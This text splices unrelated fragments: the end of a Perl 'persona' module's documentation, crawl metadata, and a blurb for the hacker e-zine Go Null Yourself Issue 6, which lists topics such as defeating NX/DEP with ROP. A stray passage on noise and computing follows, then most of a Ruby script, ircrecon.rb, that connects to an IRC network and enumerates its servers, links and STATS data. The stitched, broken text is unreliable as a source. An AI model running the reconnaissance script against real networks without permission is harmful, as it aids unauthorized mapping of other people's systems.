pressure (perhaps unknowingly) exerted by the Amsterdam Perl Mongers. Please note that if any lines were removed from the source, the path name in %INC will be postfixed with the string: (skipped %d lines for persona '%s') where the %d will be filled with the number of lines skipped, and the %s will be filled with the persona for which the lines were removed. Also note that the __FILE__ compiler constant will not have this information postfixed, as that is more or less expected to be just containing a path at all times. Elizabeth Mattijsen, <liz@dijkmat.nl>. Please report bugs to <perlbugs@dijkmat.nl>. Developed for the mod_perl environment at Booking.com. Copyright (c) 2009, 2012 Elizabeth Mattijsen <liz@dijkmat.nl>. All rights reserved. This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
http://search.cpan.org/~elizabeth/persona-0.12/lib/persona.pm
CC-MAIN-2016-44
refinedweb
1,565
62.17
Why are there two Qt Quick Controls namespaces (1.4 and 2.3) and is it okay to use both? I'm currently learning Qt, (coming from C# and WPF worlds) I was looking for a TreeView and I couldn't find it in the Design tab, then by looking at its documentation it appears that instead import QtQuick.Controls 1.4 is necessary instead of the import QtQuick.Controls 2.3 found when you create a new Qt Quick Application - Empty project. I then realized that in fact you can import both namespaces and indeed you have best of both worlds. My (folded) question is the following: Is this something okay to do and are there any caveats in doing so? Additionally, are the controls in 1.4 in the long term going to end up in 2.3? i.e. why are there two namespaces with different versions and controls? (a link to relevant documentation would be appreciated) Thank you. - SGaist Lifetime Qt Champion Hi and welcome to devnet, The modules have two different versions because they are built on top of two different technologies. You can mix them but usually use the V2 version. AFAIK, the long term plan is to obsolete V1 and completely replace it with V2. Thank you, alright!
https://forum.qt.io/topic/102740/why-are-there-two-qt-quick-controls-namespaces-1-4-and-2-3-and-is-it-okay-to-use-both
CC-MAIN-2019-30
refinedweb
215
75.4
Something for python programmers and photographers alike… In the comments of my last post Emmet Connolly pointed me in the direction of PIL – Python’s answer to PerlMagick. I’m just kicking the tyres on PIL at the moment but the signs are promising. To test PIL’s abilities I decided to see if I could programmatically Lomoize photos using PIL. I think the process of adding a Lomo effect to a photo is interesting enough that it warrants some deconstruction. Let’s start with the original image – A nice autumnal photo taken just a few weeks ago in Fota Gardens, Cork… Adding a Lomo effect will create a darkened vignette-like shadow around the photo and saturate the colors a little, creating a warm ‘artsy’ feel… This new Lomo-fied version is constructed from 3 distinct layers… - A Saturated lower layer - A Darkened upper layer - A “Mask” which will be used when superimposing the 2 layers First I create a Saturated lower layer … … then a Darkened upper layer … … Next comes the hard part. The mask which will be used when overlaying the saturated and darker images. Masks are (as their name implies) special layers which let you specify what parts of the lower image show through when sticking another image on top of it. For a Lomo effect, I use a fuzzy circular mask so that the center of the lower image is visible. I start by using a basic 256 pixel square image… … then stretch it to match the photo along it’s longest side… … then crop it so that it’s size matches that of the photo … Compositing the saturated and darkened images using the above mask results in the following Lomo-effect photo… Now all of this is pretty easy if you’re a power photoshop or GIMP user. Most power users are familiar with the common photo-editing concepts of Layers, Channels and Alph-masks etc. The tricky part (and I’m not trying to blow my own trumpet here) is commiting and codifying that knowledge in cold hard source code. A lot of Pixenate’s operations involve compositing of one kind or another, so compositing, and general mucking about with Alpha channels and masks, is a good litmus test for any Image Librarie’s abilities. So far, Python’s PIL is scoring pretty well – at least as good as Perl’s PerlMagick. To paraphrase Jennifer Aniston – “here’s the source part” (it’s my first publicly-posted Python code so please be gentle :-) )… from PIL import Image from PIL import ImageEnhance from PIL import ImageColor def lomoize (image,darkness,saturation): """ Add a 'Lomo' effect to an image. This is achieved by compositing two versions of the image on top of each other using a vignette mask so that the image appears bright and saturated in the middle, but darker in the corners. a. Saturate the lower layer b. Darken the upper layer c. overlay the two layers using a special "Vignette" mask. @param image The image to be lomoized @param darkness 0 - 1.0 How much darker the upper layer will be 0 = black 1.0 = original @param saturation How much the more saturated the lower layer will be (1.0 = no change - +1 = more saturated) @return lomoized image """ # # Get the Image size # (width,height) = image.size # # resize the mask appropriately # max = width if height > width : max = height mask = Image.open("d:/home/mask256x256.jpg").resize((max,max)) # # crop the mask to match the image size # left = (max - width) / 2 upper = (max - height) / 2 mask = mask.crop((left,upper,left+width,upper + height)) # # create the darkened upper layer for the corners # darker = ImageEnhance.Brightness(image).enhance(darkness) # # create the saturated lower layer for the center # saturated = ImageEnhance.Color(image).enhance(saturation) # # Composite the darker upper layer on top of the saturated # lower layer using the mask # lomoized = Image.composite(saturated,darker,mask) return lomoized """ Main program begins here """ kate = Image.open("d:/home/kate.jpg") lomoized = lomoize(kate,0.4,2.5) lomoized.save("d:/home/lomo.jpg", "JPEG", quality = 100) So far I like PIL but I really need to investigate how difficult it will be to deploy a PIL-based solution. Nice work, Walter — you don’t waste any time, do you?! I’m the last person in the world to be picking apart someone else’s code, but since you asked, could the image resize section be changed to max = width min = height if height > width : max = height max = width mask = Image.open(“d:/home/mask256x256.jpg”).resize((max,min)) and then leave out the cropping part? Seems to me that this would mean you would have a little bit of that lovely vignetting at the top and bottom of the image too. Oops, sorry about that, looks like the pre tags got stripped. Python doesn’t look quite the same without indentation, does it? :) Hi Emmet, I need to resize the vignette to the largest dimension – then crop so that I get a cut-off vignette – If I resize but don’t crop then the vignette is oval-shaped. Oval masks aren’t bad but I think a circular mask for Lomo is more authentic. […] Lomo Deconstructed… « Sxoop Journal from PIL import Image from PIL import ImageEnhance from PIL import ImageColor (tags: pil python image sample code) […]
https://sxoop.wordpress.com/2006/11/30/lomo-deconstructed/
CC-MAIN-2018-09
refinedweb
887
59.03
Over the weekend Stevens Pass and the Cascade mountains received several inches of fresh powder. It's been almost a month since I've been on my snowboard and I couldn't resist any longer. This morning I headed up to Stevens and spent a few hours listening to tunes on my Zune while riding Hog Heaven, Rock 'N Blue, Hog Wild, Skyline, Barrier Ridge and Marmot Meadows. What an awesome morning! ~tod tags: snowboarding, stevens+pass No, I'm not talking about that errant piece of gum in the parking lot that always seems to end up on my shoe. Or the leftover snacks that always seem to surround your child's mouth for hours after the actual meal. I'm talking about The Stickiness Factor as described by Malcolm Gladwell in The Tipping Point. I'm in the middle of the book right now, but Gladwell's discussion of The Stickiness Factor (chapter 3) revolves around two insanely popular children's shows, the iconic Sesame Street and new kid on the block Blue's Clues. As the father of a 3 year old, I found it particularly interesting from the perspective of how children learn. First of all, let's make sure we're on the same page. The Stickiness Factor is just how well someone remembers an idea...how well it sticks. Be it a salesman's pitch for a vacuum cleaner, an algorithm from a software engineering textbook or a TV commercial for Dove's Real Beauty campaign. When looking at small children (ages 2-7) the stickiness factor Gladwell refers to revolves around learning and the children's ability to retain what we're trying to teach them, via TV in these instances. Here's what he discusses with regard to Sesame Street: After all that, what else could there be? Well, Blue's Clues applied the lessons from the well-deserved success of Sesame Street and added a few more of their own: I took the liberty of paraphrasing several portions of the chapter and noted the pages where appropriate. My thoughts on this? Well, I just found it very interesting to see how they performed the research for the shows and the results. Everything my daughter does corroborates their findings as well. She loves Dora the Explorer , "Go, Diego, Go" and the Little Einsteins, which seem to use the same methodology as Blue's Clues [a 20 minute story at a slow pace with the characters taking long pauses after interacting with the viewers]. Not only does she love the shows, but she really does learn from them. One day about 6 months ago, completely out of the blue, she counted to 10 in Spanish! I know for a fact she learned that from Dora. The explanation behind repetition was quite enlightening. Once I read the concept it was very easy to see why my daughter is so insistent on watching the same movie for a week or two. The more she watches it the more comfortable she becomes with the story and the characters which allows her to take in other aspects of the movie. Like building blocks. If you're a parent of a toddler/pre-schooler then I highly recommend you read Gladwell's chapter on The Stickiness Factor from The Tipping Point. If you read just this chapter some of the discussion will be lost without context, but only around how The Stickiness Factor works inside the concept of tipping points. The child-related stuff seems to stand on its own. I extracted most of the highlights and concepts, but his explanations go in depth without getting you lost in the details. tags: tipping+point, parenting, toddler Windows Media Player is my music/video player of choice. WMP10 seemed to make it really easy for me to find my purchased music. At least I don't remember struggling to find it, more like "oh cool, here's a list of my downloads from MSNMusic." I haven't had that same luck with WMP11. Note that MSN Music has been replaced by the Zune Marketplace for purchases, just in case you were wondering. But where is my Zune music located in WMP11? Admittedly, it is pretty simple, but I seem to forget each time I upgrade to WMP11 on one of my multiple computers. [shrug] So here's where you can find it: I believe you will still need the Zune software installed on the machine and to log in every so often for the DRM to authenticate. A pain yes, but necessary. ps: Yes, that's Faith Hill on the top of my Zune pile. She can sing and she's hawt! Rule . tags: zune, operations Microsoft's new operating system, Vista, seems to have inspired a programmer to be poetic, or at least entertainingly descriptive. Check out Chalain's first reactions to Vista in So Beautiful, So Disturbing. A very good read! Found via Dare. PS: Seriously, this is some really good stuff. Go. Read. Now. tags: microsoft, vista, chalain It's been a long time since I wrote my last how2 post, but this interesting little question was brought up to me recently and I figured why not throw it up here. How would you programmatically search a string to see if it contains another string? Of course I'm doing this in C#, but the logic would be applicable to any language. [NOTE: If you just want the quick way to do this then scroll to the bottom.] Here's a visual of what I mean... We're looking to see if string1 (lookingFor) is contained anywhere within string2 (lookingIn). For example: lookingFor = abcd lookingIn = abcd OR efgh OR eabcdf OR eabfcd OR abceabfabcdghi You can see that of all the options for lookingIn, lookingFor is found in #1, #3 and #5. Each of those options are of varying difficulty to traverse though. abcd : Easy enough, the strings are exactly the same. efgh : Easy enough, the string is nowhere to be found. eabcdf : Now lookingFor is present, but it's surrounded by other letters. eabfcd : A little more complicated...the individual letters from lookingFor are present, but the exact string is not present as there is another character between b and c. abceabfabcdghi : Ok, now we're getting really complicated. At first we get all the way to the 3rd character from lookingFor [c] before being faced with an incorrect character. Then we start over again and get to the 2nd character. Finally, we find the full string towards the end of lookingIn. As you can see, the cases quickly go from simple to complicated. We have to handle multiple failures while traversing the string, lookingIn, and make sure that we're finding the whole of the string, lookingFor, not just bits and pieces. Let's see if I can explain the logic behind the code below. First of all, we want to iterate through the string we are searching through (lookingIn) to see if we can match the first letter of the string we are looking for (lookingFor). If we find the first letter then we will increase a counter [integer j below] to denote how many characters in lookingFor we have found. We then check to see if the counter is equal to the number of characters in lookingFor [the .length property]. If so, then we have found the full string and break out of the for loop. If not, then we add 1 to the counter [integer j below] and continue on to the next character in the string, lookingIn, trying to match it to the next character in lookingFor. Here's the kicker, if at any point in time the current character from lookingIn does not equal the character at the position [integer j below] in lookingFor then we reset the counter to 0 so that we start over. This is what allows case #5 above to work. It increases the counter by 1 for a, b and c then resets it to 0 when it reaches e. Here's the full code for a console app [so you can copy/paste into your compiler and play with it]: using System; using System.Collections; using System.Text; namespace StringInString { class Program { static void Main(string[] args) { bool isContained = FindString(args[0].ToLower(), args[1].ToLower()); Console.WriteLine(isContained.ToString()); } static bool FindString(string lookingFor, string lookingIn) { int j = 0; for (int i = 0; i < lookingIn.Length; i++) { if (lookingIn[i].Equals(lookingFor[j])) { j++; if (j.Equals(lookingFor.Length)) break; } else { j = 0; } } if (!j.Equals(0)) return true; else return false; } } } Now having gone through that exercise in logic, here are two quick ways built in to .NET : 1. Regular Expressions. Use the Regex.IsMatch method to determine if string1 is contained in string2. This method returns a boolean value. It would look like this [remember to add the using statement to the beginning of your class for System.Text.RegularExpressions]: bool isContained = Regex.IsMatch(lookingIn, lookingFor); int indexFound = lookingIn.IndexOf(lookingFor); Given the choice, I'll pick either of the methods built into the .NET framework every single day of the week! Why try to rebuild the wheel, especially when theirs is probably optimized for speed, efficiency and to avoid memory overflows. But, it's still interesting to work through the logic and see how the functions work. A few weeks back, zefrank had a great bit about Ocean Beach [yeah, real original name], sand castles, surfers and waves. He actually does a freakishly good job of relating it back to technology. All I have to say is "dude, I wanna be a surfer!" the show with zefrank: 02-05-07 A few months ago I was driving home from my parent's house on a dark, easy-winding, country road. It was a little after 9 o'clock at night and the pavement in front of me put me in a sort of driving trance. I noted the tall trees blanketing each side of the road preventing the moon from giving us much guidance. Every few seconds a house would whiz by, most of them set way back off the road with a few lights on inside or maybe one of those big fluorescent yard lights that shines over the driveway and a barn. My daughter was sleepily nodding off in the backseat behind me, her poor head bobbing up and down because the car seat doesn't recline in a very comfortable position. I was lost in thought...where was my life going, how would I handle the hardships ahead, emotions I hadn't felt in years, all running through my mind like a river pushing the edges of its banks. I was just following the easy curves of the road at a comfortable speed. And then there were flashing lights behind me. Blue flashing lights. "Fuck!" I walked away, well drove away, from that with my first speeding ticket in over 5 years. 50 in a 35. Fuck. Well, after talking with some friends and doing some research online [link] I discovered that Washington State judges have the ability to defer speeding tickets. Basically, if you have a clean driving record the judge can offer to not report your ticket [so it doesn't go on your driving record] if you don't commit any further driving infractions for the next year. This can be done only once every 7 years. If you do get another ticket in the next 12 months then both go on your record! Apparently, this is completely up to the judge. Since I had a clean record I called the Evergreen Division court house and asked the clerk if the judges were likely to offer deferrals. She was very nice and told me that both of their judges were proponents of the deferral program. I also asked her exactly what I needed to do in order to start/go through the process. Easy enough, just return the ticket to the address specified with the box marked that you are contesting the citation. A few months rolled by and the day of my court appearance popped up on my calendar. Gulp! I don't care what you say, it's nerve wracking just having to be there. I have to say, it couldn't have been any easier! I showed up at the courthouse a little early [good thing since I took a wrong turn!] and they let us [12 or so people] into the court room a few minutes early. At 9:30 the judge, Patricia L. Lyon, entered the court room and dealt first with the few people who had legal representation. These were the ones that had hired attorneys to fight the ticket. This only took about 10 minutes, but it was kind of funny. The judge made me laugh a few times... One of the lawyers that was supposed to represent 3 clients had called in sick and someone else from his office was there to ask for a continuance [do it another day]. The District Attorney's office had brought in a speed radar specialist though and asked the court to make the defendants or their lawyer reimburse the DA's office [county I presume] for the cost. The judge had a little fun with the guy asking him "What if you had been sick today? Would you still be asking for reimbursement? Who should pay, the lawyer for being sick? Or his clients for showing up when they were supposed to?" The DA was really squirming at that point and the judge knew she had made her point so she flat out said, "I'm giving you a hard time to make my point. People get sick and some things are just out of our control." I couldn't help but instantly like that judge! So then the lawyers leave the room and she explains to the rest of us sitting there that we have three options. If you want to contest the ticket then she'll hear your arguments and make a decision. If you just want to get the fine reduced then you need to change your plea to a mitigation hearing which should be done in another room. Or, if you have a clean driving record you can take a deferral so the ticket doesn't go on your record. That last sentence was music to my ears! She called four of us up (in alphabetical order by last name) to sit in the seats where the lawyers/defendants sit. I just happened to be first. She said good morning to me, told me that I have a perfect driving record and asked if I would like to have my ticket deferred. I replied, "most certainly!" She told the clerk to give me the paperwork, said that I could pay my $85 at the front desk and ended it with "have a good day." Long story short [yeah I know, too late]...I got my 'get out of jail free' card today! My speeding ticket won't go on my record. My insurance won't go up [um, unless they read this I suppose ]. And I can still drive for our CT vanpool.. Steve Jobs has an excellent letter, Thoughts on Music, where he discusses why iPod uses a proprietary DRM solution. The explanation isn't really anything new, but his comparison between CD sales and iTunes sales is an eye opener. Not to mention his request to the big four music companies to remove the DRM restrictions from online music. Go Steve! I agree wholeheartedly with him and his theory. I would gladly pay $1/song if it were free of restrictive software and I could play it anywhere. Right now, I'm using a Zune Subscription ($15/mo) and love it, but the flip side to that is if I ever move away from Zune then I lose all of my leased music. I certainly hope the big music companies pull their collective heads out of their collective asses sometime in the near future...I just want my music! BillG on The Daily Show (full interview below)... I thought he did well and was pretty much his normal self. Somewhat quiet with a few subtle jokes in response to Jon's jabs. I wasn't too impressed with Jon's questions/jokes. He seemed a bit off his game, not his normal cut-to-the-quick style, but more like he was doing a top 10 of the Bill Gates Lame Joke List. Think about it, how many times a day does Bill get asked "what do you see in the future of computing?" The interactive TV question was pretty good, but the way Jon played it was kind of corny. Oh well, Jon on a bad day is still better than most others out there. The crazy thing though was Bill's sudden departure. If you watch the show (or any talk show for that matter), you know that after the segment ends guests typically sit with Jon and chat about whatever [he probably just asks "watching the superbowl this sunday?" with a smile on his face] while the camera pans out and they roll the credits. Bill didn't have anything to do with that nonsense. As soon as Jon said thank you, Bill stood up, shook his hand and left the stage leaving poor Jon saying "where's he going?" This was somewhat shocking, but as Heather points out the Microsoft culture is pretty demanding and it's not unusual to see people [especially executives] jump up and leave a meeting as soon as it's over or even a few minutes before. They typically have meetings scheduled back-to-back and have to do this to make the most out of their day. I'm sure Bill was just thinking "thanks for your time now on to the next gig" without intending any insult. What I have enjoyed is Jon's subsequent bits poking fun at Bill's exit stage left. Tuesday night he played the Windows popup error bit (included below). Wednesday night he made fun of Bill walking through the production area pushing everyone out of his way on his way out (sorry I couldn't find that one on YouTube or Comedy Central, but I'll update the post as soon as I do). I especially liked the part where he tipped the guy's coffee up as he was taking a drink. Here's the full interview: [Part 1 & Part 2 @ Comedy Central] Tuesday night's bit: [@ Comedy Central] Wednesday night's bit: [I couldn't find this @ Comedy Central] Update 2.2.2007: added Wednesday night's bit. RSS 1.0, RSS 2.0 & Atom © Copyright 2008, Tod Hilton. | XHTML | CSS | WCAG | The CSS Tinderbox Page rendered at Wednesday, May 14, 2008 7:34:54 PM (Pacific Standard Time, UTC-08:00) Disclaimer
http://dirtydogstink.com/blog/default,month,2007-02.aspx
crawl-001
refinedweb
3,170
71.75
Passive beacons. Currently the SyPy only seems to pick up standard BT broadcasts and not broadcasts from beacons. Is there any facility, without modifying the firmware of the beacons, to pick up the 128-bit UUID of such. @papasmurph Exactly. I've been trying to use a complex exponential relationship with some empirically based factors but because I have different types of device, the relative numbers between device types are awful. The simplest approach is the best so far! @alidaf You can subtract TX from RSSI to get a rough distance estimation a la iBeacon's "far", "near", "immediate", but I've learned to not trust TX for real distance measurement, as most beacon manufacturers don't understand they need to relate it to the actual power. My Beacon Writer app for Wellcore's beacons makes that adjustment though. @papasmurph That was my initial thought unless I could find some mutex equivalent. I'm happy with what I have working now. The key was the delay but you also allowed me to find some more useful information from the broadcast, like the tx power. I'm seeing if I can determine the distances of the beacons from the receiver. Happy days! @alidaf You could maybe set a global to true when entering the callback and false when leaving, and then test on that before you affect the table outside of the callback. @papasmurph That sounds awesome but way beyond my current level. Python is proving a lot more difficult than I thought it would, but anyway, many, many thanks for your help. @alidaf That's some of the things my CliqTags Spotter application does (and much more: geofencing, server communication, content presentation etc), developed in Javascript for Cordova (iOS and Android), so I understand this issue. Javascript is asynchronous and (luckily) single-threaded, so I can treat each function and whatever it does as atomic, and don't get race conditions. Maybe this is included: I also dabble with Python :). @papasmurph Yes, that makes sense. The reason for a mutex is that I am creating a managed list of devices that are given a time to live. Once the time to live is up, the device is removed from the list. I don't want to remove from the list if the callback is currently adding to the list, or visa-versa. I can live without the callback, but since it is something I have now learned, I would like to use it properly and avoid race conditions, if they are even possible in Python. I'm coming to Python from C! @alidaf My advice is to not use any sleeps at all, except very short, as the advertisement buffer is very small. 1 second is way too much. Not sure about any mutex and why you'd need it. If I want to analyze data I copy-paste text from Termite. @papasmurph I had a 1 second sleep to make the output readable. That was enough to kill capturing the beacons. Is there an equivalent of a mutex to know when the callback is in operation? - papasmurph @alidaf No doubt my code works fine for me. I'll test with the latest Pycom LoPy firmware. BLE should work the same on WiPy, LoPy etc. I upgraded to latest LoPy firmware. Still works. @papasmurph For some reason, I can only detect the beacons if using the callback function. @papasmurph Yes, I made a list of everything I can pick up to determine whether it's a beacon, feather, mobile or anything else. For some reason in my own code it just wouldn't pick up beacons. I've modified yours to include specific filters and ignore anything that is not a beacon or feather and it works fine. I just need to incorporate what works back into mine! @alidaf Actually, I was mistaken (bad memory). The intention of the filtering is only to check that it's an iBeacon, discriminating other types of advertisements. It's not more specific than that. Do you in practice see other values for iBeacons? @papasmurph Brilliant, thank you. @alidaf You are right of course. I used that filter to detect my own UUID. For more details, see. That works a treat, but only if I remove the line... if not data[5] == 0x4c and data[6] == 0x00 and data[7] == 0x02 and data[8] == 0x15: Could you please point me in the direction of where the breakdown of the 'data' field is, i.e. you have used data[5], [6], [7], [8], [25], [27] and [29]. I also don't understand the line... data = [b for b in device.data] so would be grateful for any explanation here. Many thanks for the demo. Sorry for the delay in replying. I had a week off. Many thanks for that. I'll give it a go. @alidaf I figure the SyPy should be the same as the LoPy in this regards, so something like this: from network import Bluetooth import pycom import time import gc pycom.heartbeat(False) timeSleep = 0.01 timeScan = 10 bluetooth = Bluetooth() def new_adv_event(event): if event.events() == Bluetooth.NEW_ADV_EVENT: anydata = True while anydata: device = bluetooth.get_adv() if device != None: rssi = device.rssi data = [b for b in device.data] if data[5] == 0x4c and data[6] == 0x00 and data[7] == 0x02 and data[8] == 0x15: majorid = data[25] * 256 + data[26] minorid = data[27] * 256 + data[28] power = data[29] if power > 127: power -= 256 pycom.rgbled(0x000800) print("iBeacon: " + str(rssi) + '/' + str(power) + ' (' + str(rssi - power) + ') ' + str(majorid) + '/' + str(minorid)) else: pycom.rgbled(0x000008) time.sleep(timeSleep) pycom.rgbled(0x000000) else: anydata = False bluetooth.callback(trigger = Bluetooth.NEW_ADV_EVENT, handler = new_adv_event) while True: if not bluetooth.isscanning(): print("Restarting scan") bluetooth.deinit() bluetooth.init() bluetooth.start_scan(timeScan) time.sleep(1)
https://forum.pycom.io/topic/2018/passive-beacons
CC-MAIN-2018-17
refinedweb
968
66.74
Ps.js JavaScript library and REST reference Learn about the PS.js JavaScript library and REST interface for Project Server 2013, which you can use to develop custom solutions and apps for Project 2013. Last modified: February 22, 2013 Applies to: Project Professional 2013 | Project Server 2013 Project Server 2013 provides a JavaScript object model and a Representational State Transfer (REST) service that you can use to develop cross-browser web apps, task pane apps for Project Professional 2013, and apps for non-Windows devices that access Project Server 2013 and Project Online. The JavaScript object model for Project Server 2013 is defined in the PS namespace in the PS.js JavaScript library. The PS.js JavaScript library is in the %ProgramFiles%\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\PS.js file. Project Server 2013 also provides a Representational State Transfer (REST) service that has equivalent APIs to the JavaScript object model and the .NET client object model. To use the REST interface, you build and send HTTP requests to the resource endpoints that represent the tasks you want to perform. REST resources correspond to Project Server objects, properties, and methods. Resource endpoint URIs and supported HTTP request types are documented with the corresponding members of the JavaScript object model. If you're using the JavaScript object model, use the ProjectContext object as the entry point for Project Server functionality. If you're using the REST interface, use the endpoint URI (replace ServerName and pwaName in the URI). PS namespace Describes the objects in the JavaScript object model and the resources in the REST interface that you can use to develop custom solutions and apps for Project 2013.
https://msdn.microsoft.com/en-us/library/jj668539.aspx
CC-MAIN-2017-22
refinedweb
281
60.75
hashtable.c File ReferencePortable hash table implementation. More... #include "hashtable.h" #include <cfg/debug.h> #include <cfg/compiler.h> #include <cfg/macros.h> #include <string.h> Go to the source code of this file. Detailed DescriptionPortable. - Version: - Id - hashtable.c 2506 2009-04-15 08:29:07Z duplo Definition in file hashtable.c. Function Documentation Find an element in the hash table. - Parameters: - - Returns: - Data of the element, or NULL if no element was found for the given key. Definition at line 273 of file hashtable.c. Initialize (and clear) a hash table in a memory buffer. - Parameters: - - Note: - This function must be called before using the hash table. Optionally, it can be called later in the program to clear the hash table, removing all its elements. Definition at line 202 of file hashtable.c. Insert an element into the hash table. - Parameters: - - Returns: - true if insertion was successful, false otherwise (table is full) - Note: - The key for the element to insert is extract from the data with the hook. This means that this function cannot be called for hashtables with internal keys. If an element with the same key already exists in the table, it will be overwritten. It is not allowed to store NULL in the table. If you pass NULL as data, the function call will fail. Definition at line 253 of file hashtable.c. Insert an element into the hash table. - Parameters: - - Returns: - true if insertion was successful, false otherwise (table is full) - Note: - If this function is called for hash table with external keys, the key provided must be match the key that would be extracted with the hook, otherwise the function will fail. If an element with the same key already exists in the table, it will be overwritten. It is not allowed to store NULL in the table. If you pass NULL as data, the function call will fail. Definition at line 234 of file hashtable.c. For hash tables with internal keys, compute the pointer to the internal key for a given node. Definition at line 98 of file hashtable.c.
http://doc.bertos.org/2.2/hashtable_8c.html
crawl-003
refinedweb
349
68.77
Go Null Yourself E-zine Issue 6 - Topics in this issue include Floating Point Numbers Suck, How Skynet Works, Defeating NX/DEP With return-to-libc and ROP, and more. 6e413cb4d2e8da2a0c030a83866d7438 ` ` ` ` ` `-s -=-=- elchupathingy @ irc.gonullyourself.org #gny) - Reddit (stormehh @ reddit.com/r/gny):. In theory, ambient noise is limited by quantum noise (caused by the quantum movements of ions). Ambient noise may be severely reduced - but never to zero - by using cryogenically cooled parametric amplifiers. Moreover, given unlimited time and memory, the (ideal) digital computer may also solve real number problems. - --------------------------------------------------------------------------- IRC_NICK = 'IRC-Recon' # Username part of host mask to claim when registering with the network IRC_USER = 'ircrecon' # "Real name" or "gecos" information part of USER command in raw IRC IRC_INFO = %q{ircrecon.rb by duper} # Alphabetic DNS hostname or numeric IP address of target IRC server IRC_HOST = 'irc.rizon.net.' # Port number that the ircd is listening on, a.k.a. P:lines. IRC_PORT = 6697 # Will this be an SSL-based TCP connection? IS_SSL = true ## Toy with these WAIT_* globals if you experience Excess Flood, Max Sendq, etc. # Amount of time in seconds to wait when server load is heavy WAIT_SECS1 = 1.4 # How long to sleep after sending a large sequence of commands WAIT_SECS2 = 2.8 # Length of grace period between keep-alive PONG messages PONG_SECS = 8 # Label output that is not raw IRC responses with the following text OUT_LABEL = '{(IRC-RECON)}' # Boolean that increases output verbosity when set to true; displays the STATS # request that is currently awaiting a response (good for large networks.) OUT_VERBOSE = true ## Lists of local and remote raw IRC commands # Localized raw IRC commands, i.e. those without any server name argument. IRC_LOC_CMDS = [ 'HELP', 'MAP', ] # Uncommenting LIST may slow things down on large networks with many channels. # Technically however, LIST is a localized command just like the rest. # 'LIST', ] # IRC network commands, i.e. raw IRC requests that take a remote server name # as an argument. In raw IRC this appears as: "COMMAND :remote.server.name". # Feel free to add any additional custom raw IRC commands here.. The default # list was taken from RFC's and the response of the Unreal IRC HELPOP command. IRC_NET_CMDS = [ 'ADMIN', 'CREDITS', 'DALINFO', 'INFO', 'LICENSE', 'LUSERS', 'MODULES', 'MOTD', 'RULES', 'SERVLIST', 'TIME', 'TRACE', 'USERS', 'VERSION', ] ### DON'T CHANGE ANYTHING BELOW HERE UNLESS YOU KNOW WHAT YOU'RE DOING! asock, @@athread, @@acount = false, false, 0 def prem_exit(astr) puts OUT_LABEL puts "#{OUT_LABEL} #{astr} signal trap received; exiting prematurely." puts OUT_LABEL @@athread.kill() if @@athread exit(-1) end Signal.trap('INT') do puts prem_exit('Interrupt') end Signal.trap('PIPE') { prem_exit('Pipe') } Signal.trap('TERM') { prem_exit('Termination') } def show_except(aexc = nil) return false if aexc.nil? $stderr.puts(aexc.backtrace.join("\n")) $stderr.puts(aexc.inspect) true end puts OUT_LABEL puts "#{OUT_LABEL} ircrecon.rb script by duper <super@deathrow.vistech.net>" puts "#{OUT_LABEL} #{RUBY_DESCRIPTION}" puts OUT_LABEL begin print "#{OUT_LABEL} Trying..." if IS_SSL include OpenSSL @@asock = TCPSocket.new(IRC_HOST, IRC_PORT) @@asock_context = SSL::SSLContext.new() @@asock_socket = SSL::SSLSocket.new(@@asock, @@asock_context) @@asock_socket.sync_close = true @@asock_socket.connect() @@asock = @@asock_socket puts %q{SSL-IRC connection established!} puts OUT_LABEL puts "#{OUT_LABEL} #{@@asock_socket.peer_cert_chain}" acipher = @@asock_socket.cipher analgo, aproto, akeysz = acipher[0], acipher[1], acipher[2] puts OUT_LABEL puts "#{OUT_LABEL} Algorithm: #{analgo} Protocol: #{aproto} Key Size: #{akeysz} bits" else @@asock = TCPSocket.new(IRC_HOST, IRC_PORT) puts %q{IRC connection established!} end puts OUT_LABEL rescue Exception => e puts %q{'TCP connection failed!'} show_except(e) exit(-1) end print "#{OUT_LABEL} Connected to port #{IRC_PORT} on host #{IRC_HOST}" print " (SSL-enabled)" if IS_SSL puts puts "#{OUT_LABEL} Registering client info with IRC network.." puts OUT_LABEL begin @@asock.puts('NICK ' << IRC_NICK) @@asock.puts('USER ' << IRC_USER << " . . :" << IRC_INFO) rescue Exception => e show_except(e) exit(-2) end loop do l = nil begin l = @@asock.gets() break if !l or l.empty? rescue Exception => e puts %q{Error reading data while registering IRC client!} show_except(e) exit(-3) end puts l # Handle nospoof patch that deters all forms of blindly spoofing IP addresses if l[0,5].upcase.start_with?('PING ') @@asock.puts('PONG :' << l.split[1]) puts "#{OUT_LABEL} Responded to target server's nospoof PING nonce" break end # Nickname already in use if l.include?(' 433 ') @@acount += 1 @@asock.puts("NICK #{IRC_NICK}#{@@acount}") end # Read end of /MOTD, we're already registered! :-) if l.include?(' 376 ') puts "#{OUT_LABEL} Target server is not using a nospoof patch!" break end end servs, @@linez = [], [] begin print "#{OUT_LABEL} Enumerating linked server names:" @@asock.puts('LINKS') loop do l = @@asock.gets() next if !l or l.empty? x = l.split[3 .. -1] next if x.nil? or x.empty? y = l.split[0 .. 2].join(' ') if y.include?(' 364 ') @@linez << l @@servs << x.first end break if y.include?(' 365 ') end rescue Exception => e puts %q{Error encountered while reading LINKS response!} show_except(e) exit(-4) end servs.each { |s| print ' ' << s } linez.each { |k| puts k } puts puts "#{OUT_LABEL} Starting 'keep-alive' PONG sending thread" athread = Thread.new() { begin loop do @@asock.puts('PONG :' << IRC_HOST) sleep(PONG_SECS) end rescue Exception => e puts %q{Caught exception while sending 'keep-alive' PONG message!} $stderr.puts(e.inspect) return false end true } puts "#{OUT_LABEL} Executing list of localized raw IRC commands" begin IRC_LOC_CMDS.each { |c| @@asock.puts(c) } rescue Exception => e puts %q{Unable to send local command request data to server} show_except(e) exit(-5) end load_flag, @@ahash = false, {} # We're getting the STATS reports for the ircd.conf lines individually, so we # don't miss any due to the server load being too high at a particular time. # This is bound to happen consistently on a large/busy IRC network--be prepared # to wait a while for the results. def get_stats(achar, aserv = '') begin if aserv.nil? or aserv.empty? @@asock.puts('STATS ' << achar) else @@asock.puts('STATS ' << achar << ' ' << aserv) end loop do l = @@asock.gets() return false if not l or l.empty? # End of /STATS report break if l.include?(' 219 ') # Permission denied (not an IRC operator) break if l.include?(' 481 ') # Default /STATS response ("Unused", according to RFC2812 Section 5.1) break if l.include?(' 210 ') # Server load is temporarily too heavy if l.include?(' 263 ') if !@@load_flag @@load_flag = true print "#{OUT_LABEL} Warning: Server load is temporarily too heavy!" puts ' (This might take a while)' end # puts statement that was used for debugging current STATS status if OUT_VERBOSE @@ahash[achar] = Hash.new if !@@ahash[achar] if 